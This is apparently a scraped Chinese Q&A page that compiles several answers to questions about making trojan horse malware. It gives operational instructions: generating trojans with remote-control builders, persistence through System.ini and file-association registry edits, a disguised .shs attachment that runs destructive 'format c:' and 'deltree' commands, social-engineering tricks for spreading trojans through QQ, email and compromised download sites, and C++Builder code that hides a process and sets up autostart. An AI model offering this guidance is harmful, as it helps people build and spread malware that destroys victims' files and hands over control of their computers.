我想做个简单的木马病毒,怎么做,用什么软件
展开全部 你好!这就需要用到一款远程控制软件,例如灰鸽子等等 有了这款远控软件 需要有一个自己的动态域名 然后用动态域名在远程控制软件上生成一个木马病毒 这样你就可以发给别人,别人中了木马病毒之后他的电脑完全就会被控制 你就可以对他的电脑重启、关机等操作了 不过我劝你最好还是打消这个念头 即便是你拥有了远程控制软件 成功生成了木马病毒 给别人发过去 也是无法起到任何作用的 原因就是木马病毒不是免杀的 现在的杀毒软件不是吃素的 如果不是免杀的病毒给别人发过去杀毒软件立马就查杀了 没什么作用 最重要的就是你做的病毒免杀 对方的杀毒软件查杀不出来是病毒 这样就可以了 但是不要抱幻想 网上绝对不会出现免杀远控的 有的打着名字的旗号捆绑后门病毒 试想一下 别人辛辛苦苦制作出来的免杀远控会轻易的给别人或者发布到网上么?况且 免杀病毒最好不要发到网上 否则能免杀一个星期左右的病毒发到网上 估计第二天就被杀了 本人纯手打 觉得有帮助 请采纳 谢谢!!...
怎么制作木马程序?
展开全部 木马怎么编写:http://bbs.51cto.com/thread-5526-1.html学编写首先就要明白原理,12.1.2 木马的工作原理(2)http://book.51cto.com 2008-07-21 15:26 李匀 电子工业出版社博文视点 我要评论(0)摘要:《网络渗透测试——保护网络安全的技术、工具和过程》第12章木马和后门的运用,这一章主要介绍考察木马、病毒及后门应用程序,还会介绍一些恶意黑客和渗透测试人员使用的著名病毒、木马及后门程序,最后讨论如何检测这些恶意软件及在网络上预防这些恶意软件攻击的步骤,本节为木马的工作原理。
标签:网络安全 Web 恶意软件 攻击 网络渗透测试 Oracle帮您准确洞察各个物流环节12.1.2 木马的工作原理(2)3.木马的启动方式作为一个优秀的木马,自启动功能是必不可少的。
自启动可以保证木马不会因为用户的一次关机操作而彻底失去作用。
正因为该项技术如此重要,所以很多编程人员都在不停地研究和探索新的自启动技术。
一个典型的例子就是把木马加入到用户经常执行的程序(例如Explorer.exe)中,当用户执行该程序时,木马就自动执行并运行。
当然,更加普遍的方法是通过修改Windows系统文件和注册表实现自启动。
实现自启动的常用方法包括下述几种,通过启动组实现自启动这也是一种很常见的方式,很多正常的程序都用它,大家常用的QQ就是用这种方式实现自启动的,但木马很少使用这种方式,原因在于启动组的每个程序都会出现在“系统配置实用程序”(msconfig.exe,以下简称msconfig)中。
事实上,出现在“开始”菜单的“程序\启动”中足以引起普通人的注意,所以,极少有木马使用这种启动方式。
在Win.ini文件中启动同启动组一样,这也是从Windows3.2开始就可以使用的方法,是从Win16遗传到Win32的。
在Windows3.2中,Win.ini就相当于Windows9x中的注册表,在该文件中的[Windows]域中的load和run项会在Windows启动时运行,这两个项目也会出现在msconfig中,这种方法也不很适合木马使用。
在System.ini文件中启动System.ini文件位于Windows安装目录下,其中[Boot]节中的Shell= Explorer.exe是经常被用于隐藏加载木马的地方。
通常的做法是将该项变为Shell= Explorer.exe Sample.exe。
这里的Sample.exe是某个木马服务端程序。
我们可以在"Explorer.exe"后加上木马程序的路径,这样Windows启动后木马也就随之启动,而且即使是安全模式启动也不会跳过这一项,这样木马也就可以保证永远随Windows启动了,名噪一时的尼姆达病毒就使用了这种方法。
这时,如果木马程序也具有自动检测添加Shell项的功能的话,那简直是天衣无缝的绝配,我想除了使用查看进程的工具中止木马,再修改Shell项和删除木马文件外没有别的破解之法了。
但这种方式也有先天不足,因为只有一个Shell项,如果有两个木马都使用这种方式实现自启动,那么后来的木马可能会使前一个木马无法启动,此所谓以毒攻毒。
System.ini文件中的[386Ehn]节的“driver=路径\程序名”也可以用来实现自启动。
此外,System.ini中的[mic]、[drivers]、[drivers32]也是加载程序的好地方。
在*.ini文件中启动后缀为.ini的文件是系统中应用程序的启动配置文件,木马程序利用这些文件能够自启动应用程序的特点,将制作好的、带有木马服务端程序自启动命令的文件上传到目标主机中,这样就可以达到启动木马的目的了。
通过修改文件关联启动修改文件关联是木马常用手段,例如,在正常情况下,.txt文件的打开方式为Notepad.exe文件,但一旦中了文件关联木马,则.txt文件打开方式就会被修改为用木马程序打开,如著名的国产木马冰河就是这样。
冰河木马通过修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的键值,将“C:\WINDOWS\notepad.exe %1”修改为“%SystemRoot%\system32\sysexplr.exe %1”,实现该木马的启动。
只要用户双击任意一个.txt文件,原本应该使用notepad.exe程序打开.txt文件,现在就变成启动Windows system32目录下的sysexplr.exe木马程序了。
需要提醒读者的是,不仅仅是.txt文件,其他如html、JPG、Zip、rar等扩展名都是木马作者制定自动启动方案的目标。
通过捆绑文件方式启动木马和正常程序捆绑,有点类似于病毒,程序在运行时,木马程序先获得控制权或另开一个线程以监视用户操作,截取密码等,这类木马编写的难度较大,需要了解PE文件结构和Windows的底层知识(直接使用捆绑程序除外)。
使用著名的黑客软件Deception Binder就可以实现木马与正常程序的捆绑。
这是国外的一款文件合并器,小巧而功能强大。
能够捆绑任意格式(包括.txt、.jpg)文件;能够设置打开文件是否隐蔽运行;能够设置打开文件是否加入注册表启动项;能够设置打开文件时是否显示错误信息以迷惑对方等。
当木马程序连接到Notepad时,其结果会显示为Notepad,而且执行时也像是Notepad,但同时也会执行木马程序。
通过将特定的程序改名方式启动这种方式常见于针对QQ的木马,如将QQ的启动文件QQ2000b.exe,改为 QQ2000b.ico.exe(Windows默认不显示扩展名,因此它会被显示为QQ2000b.ico,而用户会认为这是一...
怎么制作简单的木马程序
1.创建一个只包含一个空格为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。
也可以点击记{写字板文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。
在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。
点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。
文件的默认名是“碎片”(在2000下的默认名为”片段”),现在我们把它改成“password01.txt”。
打开电子邮件程序将桌面上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /yc:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当然大家可以改成其它的命令)很简单,这样一个恶意的攻击程序被弄出来了!如果你是新手,建议下载Back office木马程序盗号的确很好玩,但是不提倡这个,木马不用制作直接下载木马生成器就可以了,不过要小心自己的隐私被他人窃取。
熏
木马病毒制作软件有哪些
但由于远程控制软件是“善意” 的控制,因此通常不具有隐蔽性,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被 种者电脑的门户, 使施种者可以任意毁坏、 窃取被种者的文件, 甚至远程操控被种者的电脑。
“木马”与计算机网络中常常要用到的远程控制软件有些相似,木马要达到的是“偷窃”性的远程控制;“木马”则完全相反, 如果没有很强的隐蔽性的话“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不 “刻意”地去感染其他文件...
木马怎么做的,用什么软件
1、捆绑欺骗。
把木马服务端和某个游戏捆绑成一个文件在QQ或邮件发给别人。
服务端运行后会看到游戏程序正常打开,却不会发觉木马程序已经悄悄运行,可以起到很好的迷惑作用。
而且即使别人以后重装系统了,他还是保存你给他的这个“游戏”的话,还是有可能再次中招。
2、这是教科书式的老式欺骗,方法如下:直接将木马服务端发给对方,对方运行,结果毫无反应(运行木马后的典型表现),他说:“怎么打不开呀!”你说:“哎呀,不会程序是坏了吧?”或者说:“对不起,我发错了!”然后把正确的东西(正常游戏、相片等)发给他,他收到后欢天喜地的就不想刚才该发生的事有什么不对劲了。
3、QQ冒名欺骗。
前提:你必须先拥有一个不属于你自己的QQ号。
然后使用那个号码给他的好友们发去木马程序,由于信任被盗号码的主人,他的朋友们会毫不犹豫地运行你发给他们的木马程序,结果就中招了。
4、邮件冒名欺骗。
和第三种方法类似,用匿名邮件工具冒充好友或大型网站、机构单位向别人发木马附件,别人下载附件并运行的话就中木马了。
5、危险下载点。
这是后面几位朋友提到的,蔬菜常用的方法:(据说他已经用这种方法得到了数千台肉鸡)攻破一些下载站点后,下载几个下载量大的软件,捆绑上木马,再悄悄放回去让别人下载,这样以后每增加一次下载次数,你就等于多了一台肉鸡。
或者你干脆把木马捆绑到其它软件上,然后"正大光明"的发布到各大软件下载网站,它们也不查毒,就算查也查不出我写的新木马,然后...我就不用说了,肉机会至少两位数。
6、文件夹惯性点击。
把木马文件伪装成文件夹图标后,放在一个文件夹中,然后在外面再套三四个空文件夹,很多人出于连续点击的习惯,点到那个伪装成文件夹木马时,也会收不住鼠标点下去,这样木马就成功运行了。
7、zip伪装。
这个方法是最新的,将一个木马和一个损坏的zip包(可自制)捆绑在一起,然后指定捆绑后的文件为zip图标,这样一来,除非别人看了他的后缀,否则点下去将和一般损坏的zip没什么两样,根本不知道其实已经有木马在悄悄运行了。
8、在某个公文包或者可以上传附件的论坛传上捆绑好的木马,然后把链接发给受害者。
9、网页木马法。
计算机病毒的主要传播途径有: 1.软盘 软盘作为最常用的交换媒介,在计算机应用的早期对病毒的传播发挥了巨大的作用,因那时计算机应用比较简单,可执行文件和数据文件系统都较小,许多执行文件均通过软盘相互拷贝、安装,这样病毒就能通过软盘传播文件型病毒;另外,在软盘列目录或引导机器时,引导区病毒会在软盘与硬盘引导区互相感染。
因此软盘也成了计算机病毒的主要寄生的“温床”。
2.光盘 光盘因为容量大,存储了大量的可执行文件,大量的病毒就有可能藏身于光盘,对只读式光盘,不能进行写操作,因此光盘上的病毒不能清除。
以谋利为目的非法盗版软件的制作过程中,不可能为病毒防护担负专门责任,也决不会有真正可靠可行的技术保障避免病毒的传入、传染、流行和扩散。
当前,盗版光盘的泛滥给病毒的传播带来了极大的便利。
3.硬盘 由于带病毒的硬盘在本地或移到其他地方使用、维修等,将干净的软盘传染并再扩散。
4.BBS 电子布告栏(BBS)因为上站容易、投资少,因此深受大众用户的喜爱。
BBS是由计算机爱好者自发组织的通讯站点,用户可以在BBS上进行文件交换(包括自由软件、游戏、自编程序)。
由于BBS站一般没有严格的安全管理,亦无任何限制,这样就给一些病毒程序编写者提供了传播病毒的场所。
各城市BBS站间通过中心站间进行传送,传播面较广。
随着BBS在国内的普及,给病毒的传播又增加了新的介质。
5.网络 现代通信技术的巨大进步已使空间距离不再遥远,数据、文件、电子邮件可以方便地在各个网络工作站间通过电缆、光纤或电话线路进行传送,工作站的距离可以短至并排摆放的计算机,也可以长达上万公里,正所谓“相隔天涯,如在咫尺”,但也为计算机病毒的传播提供了新的“高速公路”。
计算机病毒可以附着在正常文件中,当您从网络另一端得到一个被感染的程序,并在您的计算机上未加任何防护措施的情况下运行它,病毒就传染开来了。
这种病毒的传染方式在计算机网络连接很普及的国家是很常见的,国内计算机感染一种“进口”病毒已不再是什么大惊小怪的事了。
在我们信息国际化的同时,我们的病毒也在国际化。
大量的国外病毒随着互联网络传入国内。
随着Internet的风靡,给病毒的传播又增加了新的途径,并将成为第一传播途径。
Internet开拓性的发展使病毒可能成为灾难,病毒的传播更迅速,反病毒的任务更加艰巨。
Internet带来两种不同的安全威胁,一种威胁来自文件下载,这些被浏览的或是通过FTP下载的文件中可能存在病毒。
另一种威胁来自电子邮件。
大多数Internet邮件系统提供了在网络间传送附带格式化文档邮件的功能,因此,遭受病毒的文档或文件就可能通过网关和邮件服务器涌入企业网络。
网络使用的简易性和开放性使得这种威胁越来越严重。
当前,Internet网上病毒的最新趋势是:(1)不法分子或好事之徒制作的匿...
怎么编写一个简单的木马程序?
特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷, 使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。
我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。
那时木马的主要方法是诱骗——先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。
国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。
直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。
自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。
为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。
首先是编程工具的选择。
目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗? 启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。
Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。
Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。
不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。
因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。
双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。
这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。
因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。
不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。
首先判断目标机的操作系统是Win9x还是WinNt: { DWORD dwVersion = GetVersion(); // 得到操作系统的版本号 if (dwVersion >= 0x80000000) // 操作系统是Win9x,不是WinNt { typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD); //定义RegisterServiceProcess()函数的原型 HINSTANCE hDLL; LPREGISTERSERVICEPROCESS lpRegisterServiceProcess; hDLL = LoadLibrary("KERNEL32"); //加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess"); //得到RegisterServiceProcess()函数的地址 lpRegisterServiceProcess(GetCurrentProcessId(),1); //执行RegisterServiceProcess()函数,隐藏本进程 FreeLibrary(hDLL); //卸载动态链接库 } } 这样就终于可以隐身了(害我敲了这么多代码!)。
为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。
接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载: { char TempPath[...